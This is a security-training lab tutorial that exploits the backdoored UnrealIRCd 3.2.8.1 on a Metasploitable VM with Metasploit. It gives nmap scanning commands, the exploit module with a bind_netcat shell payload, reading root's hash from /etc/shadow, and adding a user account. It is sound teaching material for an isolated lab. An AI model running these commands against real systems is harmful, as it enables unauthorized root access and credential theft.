ComputerSecurityStudent (CSS) [Login] [Join Now]




|SECURITY TOOLS >> Metasploitable Project >> Exploits >> Current Page |Views: 24264

(Metasploitable Project: Lesson 7)

{ Exploiting UnrealIRCD 3.2.8.1 }


Section 0. Background Information
  1. Metasploitable 
  2. Pre-Requisite Lab  
  3. What UnrealRCd?
    • UnrealIRCd is an open source IRC daemon, originally based on DreamForge, and is available for Unix-like operating systems and Windows. Since the beginning of development on UnrealIRCd circa May 1999, many new features have been added and modified, including advanced security features and bug fixes, and it has become a popular server.

  4. exploit/unix/irc/unreal_ircd_3281_backdoor
    • This module exploits a malicious backdoor that was added to the Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.

  5. Lab Notes
    • In this lab we will do the following:
      1. Run an intense NMAP Scan on the Metasploitable VM
      2. Search for the Unreal Daemon
      3. Exploit the Unreal Daemon and obtain root.

  6. Legal Disclaimer
    • As a condition of your use of this Web site, you warrant to computersecuritystudent.com that you will not use this Web site for any purpose that is unlawful or that is prohibited by these terms, conditions, and notices.
    • In accordance with UCC § 2-316, this product is provided with "no warranties, either express or implied." The information contained is provided "as-is", with "no guarantee of merchantability."
    • In addition, this is a teaching website that does not condone malicious behavior of any kind.
    • You are on notice, that continuing and/or using this lab outside your "own" test environment is considered malicious and is against the law.
    • © 2013 No content replication of any kind is allowed without express written permission.

 

Section 1: Start Up the Metasploitable VM
  1. Start Up VMWare Player
    • Instructions:
      1. Click the Start Button
      2. Type Vmplayer in the search box
      3. Click on Vmplayer

     

  2. Open a Virtual Machine
    • Instructions:
      1. Click on Open a Virtual Machine

     

  3. Open the Metasploitable VM
    • Instructions:
      1. Navigate to where the Metasploitable VM is located
      2. Click on on the Metasploitable VM
      3. Click on the Open Button

     

  4. Edit the Metasploitable VM
    • Instructions:
      1. Select Metasploitable2-Linux VM
      2. Click Edit virtual machine settings

     

  5. Edit the Metasploitable VM
    • Instructions:
      1. Click on "Network Adapter NAT"
      2. Select the radio button "Bridged: Connected directly to the physical network"
      3. Click on the OK button
    • Warning:
      • By changing from NAT to Bridged opens the VM and network up to potential attacks.
      • To maintain a safe network, you could (1) skip this section and only use the host-only network, (2) unplug your router from the internet, (3) use an ACL to not allow traffic into your network, etc.

     

  6. Play the Metasploitable VM
    • Instructions:
      1. Click on the Metasploitable VM
      2. Click on Play virtual machine

 

Section 2: Determine Metasploitable IP Address
  1. Logging into Metasploitable
    • Instructions
      1. Username: msfadmin
      2. Password: msfadmin or whatever you changed it to in lesson 1.

     

  2. Determine Metasploitable IP Address
    • Instructions:
      1. ifconfig -a
    • Note(FYI):
      • This is the IP Address of the Victim Machine.
      • My IP Address is 192.168.1.109.
      • Record your IP Address.

 

Section 4: Start Up the BackTrack5R1 VM
  1. Start Up VMWare Player
    • Instructions:
      1. Click the Start Button
      2. Type Vmplayer in the search box
      3. Click on Vmplayer

     

  2. Open a Virtual Machine
    • Instructions:
      1. Click on Open a Virtual Machine

     

  3. Open the BackTrack5R1 VM
    • Instructions:
      1. Navigate to where the BackTrack5R1 VM is located
      2. Click on on the BackTrack5R1 VM
      3. Click on the Open Button

     

  4. Edit the BackTrack5R1 VM
    • Instructions:
      1. Select BackTrack5R1 VM
      2. Click Edit virtual machine settings

     

  5. Edit Virtual Machine Settings
    • Instructions:
      1. Click on Network Adapter
      2. Click on the Bridged Radio button
      3. Click on the OK Button

     

  6. Play the BackTrack5R1 VM
    • Instructions:
      1. Click on the BackTrack5R1 VM
      2. Click on Play virtual machine

     

  7. Login to BackTrack
    • Instructions:
      1. Login: root
      2. Password: toor or <whatever you changed it to>.

     

  8. Bring up the GNOME
    • Instructions:
      1. Type startx

     

  9. Start up a terminal window
    • Instructions:
      1. Click on the Terminal Window

     

  10. Obtain the IP Address
    • Instructions:
      1. ifconfig -a
    • Note(FYI):
      • My IP address 192.168.1.111
      • In your case, it will probably be different.
      • This is the machine that will be use to attack the victim machine (Metasploitable).

 

Section 5: Scanning the Victim with NMAP
  1. Run Intense NMAP Scan on the Metasploitable VM
    • Note(FYI):
      • Replace 192.168.1.109 with the Metasploitable IP Address obtained from (Section 2, Step 2).
      • This intense NMAP scan could take 3 to 5 minutes to run.
    • Instructions:
      1. nmap -p 1-65535 -T4 -A -v 192.168.1.109 2>&1 | tee /var/tmp/scan.txt

     

  2. Looking for Unreal
    • Instructions:
      1. cd /var/tmp
      2. egrep -i '(6667|6697|unreal)' scan.txt
    • Note(FYI):
      • Unreal ircd runs on port 6667 and 6697.

 

Section 6: Exploit UnrealIRCD 3.2.8.1 Backdoor Command Execution
  1. Start the Metasploit Console
    • Instructions:
      1. msfconsole

     

  2. Use the UnrealIRCD 3.2.8.1 Backdoor Command Execution Exploit
    • Instructions:
      1. search unreal
      2. use exploit/unix/irc/unreal_ircd_3281_backdoor

     

  3. Set PAYLOAD and RHOST (Victim IP Address)
    • Note(FYI):
      • Replace 192.168.1.109 with the Metasploitable IP Address obtained from (Section 2, Step 2).
    • Instructions:
      1. set PAYLOAD cmd/unix/bind_netcat
      2. show options
      3. set RHOST 192.168.1.109
    • Note(FYI):
      • Command #1, This PAYLOAD will listen for a connection and spawn a command shell via netcat.
      • Command #2, Show Options tells us that that the unreal_ircd_3281_backdoor exploit requires the RHOST variable be set to the target address.
      • Command #3, Set the RHOST variable to the victim address.

     

  4. Exploit
    • Instructions:
      1. exploit -z
      2. sessions -l
        • Where "-l" is a lowercase L as in Larry.
      3. sessions -i 1
        • Where "1" is the number one.
    • Note(FYI):
      • Command #1, Execute the module or exploit and attack the target, but use (-z) to not interact with the session after successful exploitation.
      • Command #2, List all available sessions.
      • Command #3, Use (-i) to interact with Session ID (1).  Note, your session ID might be different, please review the picture.

     

  5. Got Root?
    • Instructions:
      1. whoami
      2. hostname
      3. grep root /etc/shadow
    • Note(FYI):
      • Command #1, Print the user name associated with the current effective user ID.  Congratulations you now have root.
      • Command #2, Show the hostname of the system.  Notice the hostname command replies back with metasploitable.
      • Command #3, Extract root's encrypted password from the /etc/shadow file.

     

Section 7: Proof of Lab
  1. Proof of Lab
    • Instructions:
      1. whoami
      2. useradd -m -d /home/student2 -c "Hacked Unreal" -s /bin/bash student2
      3. grep student2 /etc/passwd
      4. date
      5. echo "Your Name"
        • Put in your actual name in place of "Your Name"
        • e.g., echo "John Gray"
    • Proof of Lab Instructions
      1. Press the <Ctrl> and <Alt> key at the same time.
      2. Press the <PrtScn> key.
      3. Paste into a word document
      4. Upload to Moodle


Help ComputerSecurityStudent
pay for continued research,
resources & bandwidth